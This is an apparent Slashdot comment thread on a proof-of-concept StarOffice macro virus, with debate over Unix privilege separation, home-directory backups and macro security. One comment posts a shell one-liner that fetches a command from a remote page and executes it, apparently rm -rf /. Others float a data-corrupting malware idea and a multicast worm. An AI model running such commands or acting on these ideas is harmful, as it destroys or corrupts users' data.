First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."

it's still basically a OS security issue

[yagu]

First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

Re:it's still basically a OS security issue

[Otter]

If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

Re:it's still basically a OS security issue

[99BottlesOfBeerInMyF]

Regardless, it's no secret of mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

Re:it's still basically a OS security issue

[jfengel]

I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

There's plenty of blame to go around, but it points out a general clue: writing secure generalized systems is hard, whether it's an OS or a word processor that thinks it's an OS. Security is everybody's problem, and you have to think about it every time you get input from a user. Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

Re:it's still basically a OS security issue

[anagama]

If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

For me, the system is the least valuable area. I have system cds and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I backup, I only backup my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.

Re:it's still basically a OS security issue

[yagu]

I wish I could add you to my friends list.

Re:it's still basically a OS security issue

[99BottlesOfBeerInMyF]

Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open another application or run arbitrary scripts. (Note, I know some OS's are starting to do this, but it needs to be built in , with good defaults and a good UI.)

I blame the office suite if it runs macros by default and if those macros are not sufficiently restricted.

Security is everybody's problem, and you have to think about it every time you get input from a user.

Agreed.

Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

I sort of agree with this. I think in the end the user should have the ability to do anything on their own system, but that as they do more dangerous, unusual, and malware like things, they should be clearly and strongly warned and made to choose an option from a sufficiently granular set of functionality.

Re:it's still basically a OS security issue

[blibbler]

A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

Re:it's still basically a OS security issue

[ElleyKitten]

I agree. It's not like if my /home got deleted I'ld be all "well, at least my frozen bubble playing is uninterrupted!"

Re:it's still basically a OS security issue

[Clover_Kicker]

People who don't backup /home every night deserve everything they get.

Re:it's still basically a OS security issue

[addaon]

losing $HOME is far more serious than losing system files

It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely do to practical issues.

Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an hour if your cheap and do incrementals to CD most of the time. When / gets so much as looked at by someone else, you get to look forward to a full re-install to get the system trustworthy again -- half an hour again on top of restoring $HOME, plus re-installing any software you might have that doesn't come with your distro.

It's not that getting / screwed with is that much more dangerous, it's admittedly no big deal if you have reasonable backups. But it's a total PITA.

Re:it's still basically a OS security issue

[zlogic]

Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.

Re:it's still basically a OS security issue

[I'm+Don+Giovanni]

"People who don't backup /home every night deserve everything they get."

But even if you did backup every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and you're spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.

Re:it's still basically a OS security issue

[flobberchops]

Thats an entire 24 hours worth of porn downloading you insensitive clod!

Re:it's still basically a OS security issue

[Fred_A]

What do you mean "uninterrupted" ? You'd have lost your high score file !!

Re:it's still basically a OS security issue

[Solra+Bizna]

This happened to me.

-:sigma.SB

Re:it's still basically a OS security issue

[chill]

If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

I don't, nor do I known anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

  -Charles

Re:it's still basically a OS security issue

[Fred_A]

In the open source world, we don't jail programs, we make them do community work ;)

Re:it's still basically a OS security issue

[phantomfive]

Yeah, we have this discussion all the time, and it drives me crazy. The most important files to the user are his own, but the attacker is much more interested in the system files, to create a botnet, or an IRC server, or whatever.

More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
find / -user $ME -perm +x -exec 'rm -i {} ;'

So even though a virus in userland can do serious damage, it is in a more vulnerable position, and can be dealt with much more easily.

Re:it's still basically a OS security issue

[DragonWriter]

I fault the OS for not giving sufficient granularity of permissions for applications.

Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless the application itself provides no dangerous capacities in the first place.

Re:it's still basically a OS security issue

[Fred_A]

First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

Sortof. There is a "security" setting in the preferences that is set to "medium" by default meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.

Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk before letting you download the crappy screensaver Y/N) so it may not be much of a protection.

Re:it's still basically a OS security issue

[mrjb]

> losing $HOME is far more serious than losing system files.

I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.

On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz /path/to/backup. Capital damage: 5 minutes to restore the backup, and up to 1 day of lost work, worst case- And that's because I have this backup run only made once per day.

Even if the virus sets your house on fire and misplaces your granny's teeth, I guess that pretty much solves the virus problem then, doesn't it?

Now compare that to the damage that a virus that has root/admin privileges can do- hosing
your entire system. I wish you good luck restoring *that* in 5 minutes.

Re:it's still basically a OS security issue

Yea, but the options usually aren't either $home or system files being vulnerable. The options usually are either $home or both being vulnerable.

Re:it's still basically a OS security issue

[PlusFiveTroll]

Hence the adage, "If you don't have a backup, you don't have data."

Flood, fire, virus, crash. Really doesn't matter, gone is gone.

Now whats more dangerous is a virus/script that changes figures and words in documents. Its likely you'll over write your backups and only have corrupt information.

Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.

Re:it's still basically a OS security issue

[Lisandro]

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

    I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be setup to do an automatic backup for you. Or, if you're really paranoid, could even run StarOffice with its very own user. The tools to protect important files are there, you just have to use them.

    What's so good about Unix is that the user/system separation is well defined - and well enforced by both the OS and applications. In that sense, it would be almost impossible for a virus or macro to bring down your system or user files if you take basic precautions. Windows, for example, implements similar (if not better) user/system separation models, but most software fail to follow it or enforce it (creating admin accounts by default, software that won't run without admin privileges, etc).

Re:it's still basically a OS security issue

[Clover_Kicker]

1) That's a lot of maybes. Viruses used to pull cute corruption tricks but I haven't seen that behaviour since I was scanning 5-1/4" floppies for boot sector viruses.

2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.

Re:it's still basically a OS security issue

[StonyUK]

Yeah, and people who connect to the Internet deserve all they get too. Remember the good old days when you could only catch a virus off a floppy? I'd like to see those Russian crackers infect millions of PCs that way!

Re:it's still basically a OS security issue

[morgan_greywolf]

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

That depends on what you keep in $HOME.

Personally, I keep my data on separate partition mounted on, say, /data or something like that.

Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dialogs to get them back to where they were.

Re:it's still basically a OS security issue

[Maljin+Jolt]

Remember the good old days when you could only catch a virus off a floppy? I'd like to see those Russian crackers infect millions of PCs that way!

All that was necessary for Russian crackers to achieve that was to release a cracked&infected latest version of Leisure Suit Larry or Space Quest to several BBS's. The rest of the millions got infected via downloaded floppys in a week or so. Game publishers did that regularly, usually at start of public anti-piracy fud campaign, just at the point when sells of a specific title turned down.

Re:it's still basically a OS security issue

[99BottlesOfBeerInMyF]

Appropriate "sandbox" security model depends on what an application is supposed to be doing

Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.

Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that

I very much agree.

P.S. the blockquote tag is not valid with just text in it. You need to nest a paragraph or other tag.

Re:it's still basically a OS security issue

[bmk67]

Try rdiff-backup.

I use this to back up three entire systems (minus certain directories such as /tmp and /var/tmp) every night to a central volume. Only the deltas get backed up, and you have the ability to do point-in-time recovery from past backups. Periodically, I move the backup directory off to a removable drive and start fresh.

Re:it's still basically a OS security issue

[EvanED]

Most users don't back up though. So while for people who DO, losing ~ isn't horrible, for 95+% of people out there it's the end of the world.

I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.

Re:it's still basically a OS security issue

[ak3ldama]

I used to use cron to make a nightly tarball of my freebsd system's home directory when i ran that as my only os. With two hard drives the process was trivial and fairly unnoticable. Just setup the other drive as a /backup or so. Have cron.daily do a "tar -czf /backup/nightly.tar.gz /home". The details are sketchy as this was years ago, but it worked nicely and could easily have been done weekly instead of daily.

I did this more to be able to track a change in code incase something happened. This should have been solved by RAID and a SCM system but I was/am young and stupid.

Re:it's still basically a OS security issue

[poot_rootbeer]

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.

Re:it's still basically a OS security issue

Call me crazy, but I back up every day. I used to rely on raid mirroring, but after having file system corruption mirrored too many times I stopped doing that. Instead, my approach is:

1. Nightly mirroring with rdiff. This gives me a history and a delay for "undeleting" files. Granted the mirror drives live in the same file server so...

2. Nightly archiving of critical data (mostly ~/Documents). This is tar-balled with weekly fulls and daily incrementals.

3. Tarball to DVD. This used to be biweekly, but is now a weekly task. Everything burned to DVD is tracked in a database (which is also periodically backed up to DVD) with MD5 and/or SHA. To facilitate clearing diskspace the archives on the hard drive are checked against those on DVD and, if identical, removed. Disks are numbered on the disk and in the database.

4. Irregular backups to DVD using the same utility, no tarballing.

What this gives me is layers of data security with a decent scheme for finding data. The front end to the db allows file path/name querying and reports on DVD and filesystem paths. Queries can be limited to a disk or the whole set, etc., etc., or just go directly to the SQL.

Although a little bit of work to setup this has worked quite well for me the last couple of years. I've recovered data and have an archive of my critical files.

So, in short, some people *do* take their data seriously enough to protect it properly.

Re:it's still basically a OS security issue

[Omega+Blue]

We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

If your entire system is compromised, you lose $HOME anyway. It's not like if you lose your system somehow $HOME escapes destruction.

Re:it's still basically a OS security issue

Every night? I don't even download that much pr0n anymore, and I definitely don't make big important stuff that often.

I do backup my files, but only when changes have become big enough that loosing them would be a real problem.

Re:it's still basically a OS security issue

[Clover_Kicker]

It's a cron job.

99.9% of the time the backup doesn't capture any interesting changes, but you never know.

Re:it's still basically a OS security issue

[Makarakalax]

Your point is valid but somewhat ridiculous. I have 4 users on my linux computer, how can you say losing all of their files is better than one of them losing their files?

Re:it's still basically a OS security issue

[Eivind]

This is stupid. To most people, $HOME is about 1000 times more valuable than the sum total of everything stored outside of $HOME. Thus wiping $HOME is equally serious (more or less) as wiping the entire system.

Re:it's still basically a OS security issue

[Eivind]

Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely do to practical issues.

I beg to differ. I mean, I agree one should backup. But actually, with todays users and todays machines, the large majority of the data and also the largest deltas live in $HOME.

I've got a single 300GB disc. Perfectly average, and by no means high-end.

The sum total of the operating-system and applications comes to perhaps 5GB. The sum total of $HOME comes to 200GB.

Backing up home is in practice exactly as much work as backing up the entire computer.

And no, the deltas are *not* smaller. If I delete a *single* dvd-image (say the old Mandriva.iso) from my $HOME, that's more than the sum total of deltas for the OS over the entire supported lifespan.

Re:it's still basically a OS security issue

Correction, you "stupid mother fucker."

As you said, on a "large multi-user Unix system", wiping out ~ is a big deal for YOU. The rest of the users don't give a fuck. And that is why its not as bad as a system-wide impact: one unfortunate (or stupid) bastard instead of 100.

Missing the best part.

What? No link to the "adult content?"

Re:Missing the best part.

Holy crap, this isn't FP? I think the /. bylaws state that Yagu has to cede first post because he didn't immeadiately jump on the pr0n aspect of the story.

Re:Missing the best part.

[slide-rule]

I'd like to request that such "concept viruses" as this have "NSFW" encoded in their names... w32.ooBasic.NSFW (or something). That'd be really handy. ;-)

Re:Missing the best part.

[moro_666]

and why are they calling this a virus or a flaw ?

i thought that free pr0n was a feature ...

Virus!?

[Kesch]

It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

I don't call that a virus, I call it a feature.

Hopefully the next version will allow you to enter keywords to guide the image downloader.

Re:Virus!?

Proficient at typing with one hand, are you?

Re:Virus!?

[IAmTheDave]

I don't call that a virus, I call it a feature.

Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

I knew it was insecure.

Re:Virus!?

[packetmon]

echo uggc://jjj.aet4h.pbz/serrofq/onol-qbyy-1.wct | rot13 | xargs firefox

Re:Virus!?

[Jim+Hall]

What, no screenshots?

Re:Virus!?

[bobsledbob]

I thought BSD was dying?

Re:Virus!?

[caluml]

Yeah, I bet it isn't even a virus. Someone was caught looking at porn, and they came up with the excuse:
Look! It must be a virus. Oh yeah, Star Office. They don't have viruses, you say? Well, it must be the first one ever.

virus?

[gEvil+(beta)]

It downloads an image file with adult content from the Internet and opens that file in a new document

That's no virus, that's a productivity tool!

Re:virus?

A re-productivity tool!

Auto Pron Download

[93,000]

. . . It downloads an image file with adult content from the Internet and opens that file in a new document . . .

Automatically? Shouldn't this be considered a feature rather than a virus?

A Virus

[CastrTroy]

Is this really a virus. It downloads and displays and image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.

Re:A Virus

[Golias]

A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.

That's pretty much all you need to know about Windows and MS-Office.

Re:A Virus

[soundoff]

As said in TFA, this virus is merely a proof of concept. Using the most simplistic expansion of the idea, imagine if it did this, say, every time you ran StarOffice. Fifty times. Every minute. On a slightly less simplistic expansion, imagine if it downloaded something other than an image. A trojan, perhaps. Another virus that it saved instead of your currently-open document mydocument.doc.exe.

Re:A Virus

[Whiney+Mac+Fanboy]

Yes, it shows all the characteristics of a virus - it attaches itself to something & self propagates. It's not a particularly malicious or effective Virus, but it's most certainly a virus.

Re:A Virus

[packetmon]

What do you think would happen if someone scripted something into it... Remember its a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

Re:A Virus

[mark-t]

I saw nothing in the article that indicated anything about it being able to propogate.

Re:A Virus

[drpimp]

It's a PoC (proof of concept), they could have just as well made an alert box popup with the wording "pwned". But even still, what they made this PoC do, it is simply arbitrary code, and anything else could be put in place to actually conduct a malicious attack. "Virus" should not be in this title, exploit would be more appropo. Not to mention, unless you run StarOffice as root, only whatever user you are using this app will have this permissions to do it's dirty deeds.

Re:A Virus

[heinousjay]

Yeah, I'd be happy to only lose my home, as long as my precious /bin directory wasn't erased. I can easily replicate all my work, but I'd never be able to reinstall my software.

Re:A Virus

[Whiney+Mac+Fanboy]

Not in the linked slashdot article, I read this from PC World this morning:

Typically, a virus using macros infects a template, which is then read when opening other documents and infects those also, Schouwenberg said. The Stardust virus is contained in a StarOffice document that uses macros and then infects a global template.

If a user opens a document infected with Stardust, every StarOffice text document, with a ".sxw" extension, or document template, with a ".stw" extension, will be infected, Schouwenberg said.

Global Template! Typical MO for an old skool macro virus.... (if true).

That said - it is a pretty ineffective virus - it has to ask the user if it's allowed to execute the basic macro & then *still* only has access to user files.

Re:A Virus

[mark-t]

rm -rf / (which based on the contents of the url you referred to above, I assume is the command you would be invoking with the one-line script) would have no serious effects on a Unix system unless you were running as root. It would have the annoying consequence of removing every file on the system that is owned by the current user, but in all honesty, the responsibility of backing up one's own documents is a small enough scope project that there's no reason people shouldn't be doing that regularly. Unfortunately, most people (myself included, I must ashamedly admit) have to experience one or two critical system failures and lose weeks or months worth of work at a time before they get a clue that this simple precautionary measure pays for its effort a thousand-fold when its needed.

As for running as root, there is rarely any need to run as root on a Unix system. Software that genuinely requires root priviledges to operate can be run through sudo, and the number of applications that is the case for is extremely tiny. In any event, StarOffice is not one of them.

Re:A Virus

[Fred_A]

.sxw ? So OpenDocument files are immune ?

Re:A Virus

[Whiney+Mac+Fanboy]

OO2 users are not affected (apparantly)

Re:A Virus

Old skool macro virus?

Stoned was an old skool virus. This is still a new-fangled macro virus, that doesn't quite feel like a real virus, even though it meets the definition. (And don't get me started on the "email virus" that requires you to open the attachment.)

Re:A Virus

Let's see. Won't hurt me. :) ... Hmm.. ..
Wait a minute. Why is the hd light on? huh? ...
NO!
I'll sue you!!!!!!! NOOO!!!!!!!!! STOP!!!

what we all want to know...

[joe+155]

... is do you actually get to see the adult content whilst you get infected? it'd make it so much less annoying.

I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.

I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure

Learning period

[suv4x4]

The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.

Re:Learning period

[TouchOfRed]

Ha. One of these days an offer is going to work, and ill have free pron and FREE MONEY. Then we'll see whose laughing.

Re:Learning period

[aallmighty]

hopefully with open source products, however, patches will be available much more quickly since anyone could write the patch. in fact, since people tend to be competitive in nature, there will probably be people out there dying for things like this to happen so they can be the l337 programmer to fix it.

Re:Learning period

[suv4x4]

hopefully with open source products, however, patches will be available much more quickly since anyone could write the patch. in fact, since people tend to be competitive in nature, there will probably be people out there dying for things like this to happen so they can be the l337 programmer to fix it.

Not so easy, don't forget that the patches have to be reviewed by some central authrority (like the guys that started the product? dunno), otherwise it'll be just as easy to sneak in a backdoor or a whole trojan in the patch itself.

Re:Learning period

You should notify the Apache crew....

Re:Learning period

[aallmighty]

agreed... but reviewing a patch should surely be quicker than writing it themselves.

Re:Learning period

[tapo]

Here's my problem.

How will they patch it?

When the OOo team put out version 2.0.1, the only way I could see to upgrade was to do a full reinstall. Now with Firefox, it was a little annoying downloading 5 MB versions every few weeks, until the 1.5 release came with a good autoupdate system.

OpenOffice is what, 80-90 MB? There is no way I can download something that size - especially on dialup - just to fix a single security issue. The OOo team needs to invest in a decent, enterprise-grade network patching system ASAP.

Re:Learning period

[msuarezalvarez]

I am quite sure they'll be quite happy to hear about your donation of time/money/whatever.

Re:Learning period

[realnowhereman]

80-90MB? Not if you use a decent distribution that has modularised the binaries:

$ apt-cache show openoffice.org-writer
Package: openoffice.org-writer
Installed-Size: 10944
Version: 2.0.2-3
Size: 4945590


5 MB download, 10 MB install. Not that painful really.

viral threat...

people scared by threat: 3
people who don't care and want to see the adult content: 423221

(someone had to say it)

POC != virus

proof of concept is not a virus, sure it could be, but until its in the wild its not really

Re:POC != virus

Who wants McAfee, Symantec or OneCare to phone-home about something on your machine that heuristics got 'curious' about?
Should it show up next week on everyones radar ... do you really want that initial information forwarded to "proper authorities"?

Get a Windows antivirus product version that runs fine if fully blocked by firewall rules, and can be simply and manually updated!

--
Just say NO to software subscriptions
Just say NO to paying for time-bombs.
Just say NO to cripple-ware software.

Why go through the trouble?

[MagicM]

If you want to trick someone into viewing an image, why not just embed the image in the document?

Where is the "proof" (and the "virus") in this "proof of concept virus"?

Re:Why go through the trouble?

[sidfaiwu]

The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.

Re:Why go through the trouble?

[CastrTroy]

Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.

Re:Why go through the trouble?

[BasilBrush]

No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or it's links.

Re:Why go through the trouble?

[sidfaiwu]

I see your point. I guess that the 'proof' would require demonstration that the code can be replaced with something malicious. I suppose the creators decided that downloading unexpected content from the web sufficiently demonstrates this.

Bypass mechanism

[16K+Ram+Pack]

Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

Re:Bypass mechanism

Isn't that where the computer industry is moving towards? Security from viruses. Security from spyware. Security from music theft. Security from movie theft....

Re:Bypass mechanism

[DragonWriter]

Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.

Re:Bypass mechanism

[Steve001]

I'm a StarOffice 8 user. In response to this thread I opened up StarOffice to see what the default macro settings are. I've not changed them since installing StarOffice so it should be set to the default.

Checking Macro Security (under Tools - Options - StarOffice - Security - Macro Security...) it was set for Medium. Medium requires manual confirmation before executing macros from untrusted sources. I checked my trusted sources list and found none listed.

This indicates to me that with my macro security set to medium a macro will not run unless I choose to run it. Unless I am wrong, only people who set Macro Security to Low (indicated as Not Recommended) would be endangered from incoming macros since they would run without confirmation.

Nice!

[derxob]

"It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content..

Re:Nice!

[joe+155]

"but imagine what could potentially be used in place of the adult content.."

It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n

Re:Nice!

[gewalker]

Hmm, maybe I need to start using Star Office after all.

Bad terminology. Not a virus.

[mark-t]

To qualify as a virus, it must be capable of propogating somehow, yet there is nothing in the article that indicates that it could be adapted do this.

This so-called virus, therefore, is just a trojan.

Proof of Concept to infect the planet

[packetmon]

I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

Re:Proof of Concept to infect the planet

Wow! Go blow your horn somewhere else... or better yet, get a job - it looks like you got way too much time on your hands.

Re:Proof of Concept to infect the planet

Multicast doesnt work across the interwebs like you read about in your ccnp books. The multicast ranges are not typically used when transiting multiple ASs.

Re:Proof of Concept to infect the planet

[killmenow]

The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assuming most people (even here, on slashdot, where all the geeks are) don't know what multicast is...because it's not in widescale use. From Wikipedia: "In order to prevent conflicts (where two groups have the same group IP) most routers will not forward multicast messages onto other network segments. This behaviour is, however, sometimes configurable on a case-by-case basis (it depends on the router software)."

And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability. Also from Wikipedia: "Multicast security is a major issue. Standard, practical, communications security solutions normally employ symmetric cryptography. But applying that to IP Multicast traffic would enable any of the receivers to pose as the sender. This is clearly unacceptable. The IETF MSEC workgroup is developing security protocols to solve this problem, mostly within the architectural framework of the IPsec protocol suite.

IPsec cannot be used in the multicast scenario because IPsec security associations are bound to two hosts and not many. IETF proposed a new protocol TESLA, which is quite convincing and flexible for multicast security."

Re:Proof of Concept to infect the planet

[Salsaman]

Will be strange to see what else comes out of this.

Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.

Re:Proof of Concept to infect the planet

[flooey]

And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability.

The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.

